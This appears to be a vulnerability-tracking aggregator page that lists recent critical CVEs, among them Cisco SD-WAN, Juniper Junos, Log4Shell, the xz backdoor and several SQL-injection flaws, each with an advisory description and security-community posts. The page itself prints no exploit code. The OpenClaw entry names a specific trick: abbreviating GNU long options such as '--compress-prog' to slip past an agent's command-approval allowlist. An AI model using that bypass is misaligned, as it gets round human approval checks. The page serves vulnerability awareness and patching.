CVE-2026-20127

Overview

Cisco
Cisco Catalyst SD-WAN Manager

25 Feb 2026

Published

26 Feb 2026

Updated

CVSS v3.1

CRITICAL (10.0)

EPSS

2.19%

MITRE

KEV

Description

A vulnerability in the peering authentication in Cisco Catalyst SD-WAN Controller, formerly SD-WAN vSmart, and Cisco Catalyst SD-WAN Manager, formerly SD-WAN vManage, could allow an unauthenticated, remote attacker to bypass authentication and obtain administrative privileges on an affected system. This vulnerability exists because the peering authentication mechanism in an affected system is not working properly. An attacker could exploit this vulnerability by sending crafted requests to an affected system. A successful exploit could allow the attacker to log in to an affected Cisco Catalyst SD-WAN Controller as an internal, high-privileged, non-root user account. Using this account, the attacker could access NETCONF, which would then allow the attacker to manipulate network configuration for the SD-WAN fabric. 

Statistics

8 Posts

Last activity: 2 hours ago

Fediverse

Davi Muir @davimuir

Cisco SDWAN Controller vulnerability in the wild and at the network edge. CVE-2026-20127 by UAT-8616. Heads up. https://blog.talosintelligence.com/uat-8616-sd-wan/ #threatintelligence #cybersecurity #cisco

0
0
0
22h ago

Bluesky

キタきつね @kitafox.bsky.social

Cisco SD-WAN ゼロデイ脆弱性 CVE-2026-20127 が 2023 年から管理者アクセスに悪用される Cisco SD-WAN Zero-Day CVE-2026-20127 Exploited Since 2023 for Admin Access #HackerNews (Feb 26) thehackernews.com/2026/02/cisc...

0
0
0
22h ago

OpsMatters @opsmatters.com

The latest update for #ArcticWolf includes "CVE-2026-20127: Cisco Catalyst SD-WAN Controller Authentication Bypass Vulnerability" and "Welcoming Sevco Security: Expanding the Aurora Platform with Visionary Exposure Management". #cybersecurity #infosec #networks https://opsmtrs.com/2ZFbaTl

0
0
0
14h ago

Eyal Estrin ☁️ @eyalestrin.bsky.social

CISA and Partners Release Guidance for Ongoing Global Exploitation of Cisco SD-WAN Systems (CVE-2026-20127) #patchmanagement

0
0
0
11h ago

Information Security Briefly @infosecbriefly.bsky.social

A critical Cisco Catalyst SD-WAN vulnerability (CVE-2026-20127) remained undetected for three years before attackers exploited it to bypass authentication, gain root access, and steal data through chained exploitation with older flaws.

0
0
0
3h ago

OpsMatters @opsmatters.com

The latest update for #Foresiet includes "CVE-2026-20127: In-Depth Analysis of the Cisco Catalyst SD-WAN Authentication Bypass Vulnerability" and "Leaked Credentials: The Hidden Supply Chain Powering Modern Ransomware Attacks". #cybersecurity #infosec https://opsmtrs.com/3J3CMGz

0
0
0
2h ago

piggo @pigondrugs.bsky.social

~Sophos~ CISA warns two Cisco SD-WAN vulnerabilities are actively exploited, allowing for authentication bypass and privilege escalation. - IOCs: CVE-2026-20127, CVE-2022-20775 - #CVE202620127 #Cisco #ThreatIntel

0
0
0
16h ago

OpsMatters @opsmatters.com

The latest update for #CyCognito includes "Emerging Threat: Cisco Catalyst SD-WAN Authentication Bypass (CVE-2026-20127)" and "Emerging Threat – Dell RecoverPoint for VMs Hardcoded Credential (CVE-2026-22769)". #cybersecurity #AttackSurfaceManagement #EASM https://opsmtrs.com/44Srq0X

0
0
0
15h ago

CVE-2026-21902

Overview

Juniper Networks
Junos OS Evolved

25 Feb 2026

Published

26 Feb 2026

Updated

CVSS v3.1

CRITICAL (9.8)

EPSS

0.25%

MITRE

KEV

Description

An Incorrect Permission Assignment for Critical Resource vulnerability in the On-Box Anomaly detection framework of Juniper Networks Junos OS Evolved on PTX Series allows an unauthenticated, network-based attacker to execute code as root. The On-Box Anomaly detection framework should only be reachable by other internal processes over the internal routing instance, but not over an externally exposed port. With the ability to access and manipulate the service to execute code as root a remote attacker can take complete control of the device. Please note that this service is enabled by default as no specific configuration is required. This issue affects Junos OS Evolved on PTX Series: * 25.4 versions before 25.4R1-S1-EVO, 25.4R2-EVO. This issue does not affect Junos OS Evolved versions before 25.4R1-EVO. This issue does not affect Junos OS.

Statistics

5 Posts
4 Interactions

Last activity: 6 hours ago

Fediverse

ekiledjian @edwardk

Juniper Networks has released an update for its Junos OS Evolved to fix a critical vulnerability (CVE-2026-21902) affecting PTX series routers. This flaw, if exploited by an unauthenticated attacker, could allow for arbitrary code execution with root privileges, potentially giving an attacker complete control over the device.
https://www.securityweek.com/juniper-networks-ptx-routers-affected-by-critical-vulnerability/

1
0
0
8h ago

Jeff Hall - PCIGuru :verified: @jbhall56

The security issue is identified as CVE-2026-21902 and is caused by incorrect permission assignment in the ‘On-Box Anomaly Detection’ framework, which should be exposed to internal processes only over the internal routing interface. bleepingcomputer.com/news/security/critical-juniper-networks-ptx-flaw-allows-full-router-takeover/

0
0
0
6h ago

Bluesky

Sami Laiho @samilaiho.com

Junos OS Evolved: PTX Series: A vulnerability allows a unauthenticated, network-based attacker to execute code as root (CVE-2026-21902) URL: supportportal.juniper.net/s/article/20... Classification: Critical, Solution: Official Fix, Exploit Maturity: Unproven, CVSSv4.0: 9.3

1
0
0
12h ago

Information Security Briefly @infosecbriefly.bsky.social

Juniper Networks released an emergency patch for CVE-2026-21902, a critical vulnerability in Junos OS Evolved that allows unauthenticated remote attackers to execute arbitrary code with root privileges on PTX routers.

1
0
0
9h ago

PCI Guru @jbhall56.bsky.social

The security issue is identified as CVE-2026-21902 and is caused by incorrect permission assignment in the ‘On-Box Anomaly Detection’ framework. bleepingcomputer.com/news/security/critical-juniper-networks-ptx-flaw-allows-full-router-takeover/

1
0
0
6h ago

CVE-2025-0282

Overview

Ivanti
Connect Secure

08 Jan 2025

Published

21 Oct 2025

Updated

CVSS v3.1

CRITICAL (9.0)

EPSS

94.12%

MITRE

KEV

Description

A stack-based buffer overflow in Ivanti Connect Secure before version 22.7R2.5, Ivanti Policy Secure before version 22.7R1.2, and Ivanti Neurons for ZTA gateways before version 22.7R2.3 allows a remote unauthenticated attacker to achieve remote code execution.

Statistics

2 Posts
2 Interactions

Last activity: 2 hours ago

Fediverse

/G|T|R|O|N|I|X\ :python: :emacs: :nix: :linux: @gtronix

"CISA warns that RESURGE malware can be dormant on Ivanti devices"

"[...] Cybersecurity and Infrastructure Security Agency (CISA) has released new details about RESURGE, a malicious implant used in zero-day attacks exploiting CVE-2025-0282 to breach Ivanti Connect Secure devices. The U.S."

https://www.bleepingcomputer.com/news/security/cisa-warns-that-resurge-malware-can-be-dormant-on-ivanti-devices/

#Cybersecurity

0
0
0
2h ago

Bluesky

BleepingComputer @bleepingcomputer.com

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has released new details about RESURGE, a malicious implant used in zero-day attacks exploiting CVE-2025-0282 to breach Ivanti Connect Secure devices.

0
2
0
4h ago

CVE-2021-44228

Overview

Apache Software Foundation
Apache Log4j2

10 Dec 2021

Published

21 Oct 2025

Updated

CVSS

Pending

EPSS

94.36%

MITRE

KEV

Description

Apache Log4j2 2.0-beta9 through 2.15.0 (excluding security releases 2.12.2, 2.12.3, and 2.3.1) JNDI features used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled. From log4j 2.15.0, this behavior has been disabled by default. From version 2.16.0 (along with 2.12.2, 2.12.3, and 2.3.1), this functionality has been completely removed. Note that this vulnerability is specific to log4j-core and does not affect log4net, log4cxx, or other Apache Logging Services projects.

Statistics

2 Posts

Last activity: 11 hours ago

Fediverse

Michael I Ransier @thecybermind

SENTINEL BRIEF: Log4Shell (CVE-2021-44228) is an architectural failure, not just a bug. Our V7.4 Forensic Analysis explores the JNDI lookup logic failure that subverts Zero Trust topology. Moving beyond the patch to topological defense. Read the full report at The Cyber Mind Co.

https://thecybermind.co/2026/02/26/log4shell-cve-2021-44228/?utm_source=mastodon&utm_medium=jetpack_social

0
0
0
22h ago

Bluesky

Undercode Testing @undercode.bsky.social

Hunters, Load Your Queries: The Log4J Icon Hash That Exposes Vulnerable Systems + Video Introduction: The infamous Log4Shell vulnerability (CVE-2021-44228) remains a persistent threat years after its disclosure, with unpatched systems still scattered across the internet. Security researchers and…

0
0
0
11h ago

CVE-2026-28363

Overview

OpenClaw
OpenClaw

27 Feb 2026

Published

27 Feb 2026

Updated

CVSS v3.1

CRITICAL (9.9)

EPSS

0.08%

MITRE

KEV

Description

In OpenClaw before 2026.2.23, tools.exec.safeBins validation for sort could be bypassed via GNU long-option abbreviations (such as --compress-prog) in allowlist mode, leading to approval-free execution paths that were intended to require approval. Only an exact string such as --compress-program was denied.

Statistics

2 Posts

Last activity: Last hour

Fediverse

Raphael @0x3e4

another day another critical vulnerability in openclaw 🥲🤡

"In OpenClaw before 2026.2.23, tools.exec.safeBins validation for sort could be bypassed via GNU long-option abbreviations (such as --compress-prog) in allowlist mode, leading to approval-free execution paths that were intended to require approval."

🔐 CVE-2026-28363

📊 CVSS: 9.9 · Critical
📅 02/27/2026, 04:16 AM
🛡️ CWE: CWE-184
📦 Affected: OpenClaw OpenClaw (< 2026.2.23)

🔗 https://hecate.pw/vulnerability/CVE-2026-28363

#cve #vulnerability #hecate

0
0
0
11h ago

Bluesky

CyberHub @cyberhub.blog

📌 CVE-2026-28363 - In OpenClaw before 2026.2.23, tools.exec.safeBins validation for sort could be bypassed via GNU long-option abbreviations (such as --compress-prog) in... https://www.cyberhub.blog/cves/CVE-2026-28363

0
0
0
Last hour

CVE-2026-3301

Overview

Totolink
N300RH

27 Feb 2026

Published

27 Feb 2026

Updated

CVSS v4.0

CRITICAL (9.3)

EPSS

0.89%

MITRE

KEV

Description

A security flaw has been discovered in Totolink N300RH 6.1c.1353_B20190305. Affected by this vulnerability is the function setWebWlanIdx of the file /cgi-bin/cstecgi.cgi of the component Web Management Interface. Performing a manipulation of the argument webWlanIdx results in os command injection. The attack can be initiated remotely. The exploit has been released to the public and may be used for attacks.

Statistics

2 Posts

Last activity: 3 hours ago

Fediverse

Offensive Sequence @offseq

⚠️ CRITICAL OS command injection in Totolink N300RH (v6.1c.1353_B20190305) — CVE-2026-3301. Unauthenticated remote exploit possible, with public exploit code out. Restrict access & monitor until patch released. https://radar.offseq.com/threat/cve-2026-3301-os-command-injection-in-totolink-n30-8ab5e0b9 #OffSeq #CVE20263301 #IoTSecurity

0
0
0
14h ago

Bluesky

CyberHub @cyberhub.blog

📌 CVE-2026-3301 - A security flaw has been discovered in Totolink N300RH 6.1c.1353_B20190305. Affected by this vulnerability is the function setWebWlanIdx of the file /... https://www.cyberhub.blog/cves/CVE-2026-3301

0
0
0
3h ago

CVE-2024-3094

Overview

xz
xz

29 Mar 2024

Published

20 Nov 2025

Updated

CVSS v3.1

CRITICAL (10.0)

EPSS

85.80%

MITRE

KEV

Description

Malicious code was discovered in the upstream tarballs of xz, starting with version 5.6.0. Through a series of complex obfuscations, the liblzma build process extracts a prebuilt object file from a disguised test file existing in the source code, which is then used to modify specific functions in the liblzma code. This results in a modified liblzma library that can be used by any software linked against this library, intercepting and modifying the data interaction with this library.

Statistics

1 Post
3 Interactions

Last activity: 20 hours ago

Fediverse

cs @cs

Veritasium covers the #xz compromise. This is well done. It starts off explaining open source. It explains encryption and compression. It explains software dependencies. It explains how the back door would have worked. Good watch.

#Backdoor #Veritasium #CVE #CVE20243094
https://youtu.be/aoag03mSuXQ

1
2
0
20h ago

CVE-2019-25457

Overview

Web-ofisi
Firma

22 Feb 2026

Published

25 Feb 2026

Updated

CVSS v4.0

HIGH (8.8)

EPSS

0.09%

MITRE

KEV

Description

Web Ofisi Firma v13 contains an SQL injection vulnerability that allows unauthenticated attackers to manipulate database queries by injecting SQL code through the 'oz' array parameter. Attackers can send GET requests to category pages with malicious 'oz[]' values using time-based blind SQL injection payloads to extract sensitive database information.

Statistics

1 Post
2 Interactions

Last activity: 19 hours ago

Bluesky

CyberHub @cyberhub.blog

📌 CVE-2019-25457 - Web Ofisi Firma v13 contains an SQL injection vulnerability that allows unauthenticated attackers to manipulate database queries by injecting SQL code... https://www.cyberhub.blog/cves/CVE-2019-25457

0
2
0
19h ago

CVE-2026-25746

Overview

openemr
openemr

25 Feb 2026

Published

26 Feb 2026

Updated

CVSS v3.1

HIGH (8.8)

EPSS

0.04%

MITRE

KEV

Description

OpenEMR is a free and open source electronic health records and medical practice management application. Versions prior to 8.0.0 contain a SQL injection vulnerability in prescription that can be exploited by authenticated attackers. The vulnerability exists due to insufficient input validation in the prescription listing functionality. Version 8.0.0 fixes the vulnerability.

Statistics

1 Post
1 Interaction

Last activity: 4 hours ago

Bluesky

CyberHub @cyberhub.blog

📌 CVE-2026-25746 - OpenEMR is a free and open source electronic health records and medical practice management application. Versions prior to 8.0.0 contain a SQL injecti... https://www.cyberhub.blog/cves/CVE-2026-25746

0
1
0
4h ago

CVE-2019-25456

Overview

Web-ofisi
Emlak

22 Feb 2026

Published

25 Feb 2026

Updated

CVSS v4.0

HIGH (8.8)

EPSS

0.11%

MITRE

KEV

Description

Web Ofisi Emlak v2 contains an SQL injection vulnerability that allows unauthenticated attackers to manipulate database queries by injecting SQL code through the 'ara' GET parameter. Attackers can send requests to with time-based SQL injection payloads to extract sensitive database information or cause denial of service.

Statistics

1 Post
1 Interaction

Last activity: 21 hours ago

Bluesky

CyberHub @cyberhub.blog

📌 CVE-2019-25456 - Web Ofisi Emlak v2 contains an SQL injection vulnerability that allows unauthenticated attackers to manipulate database queries by injecting SQL code ... https://www.cyberhub.blog/cves/CVE-2019-25456

0
1
0
21h ago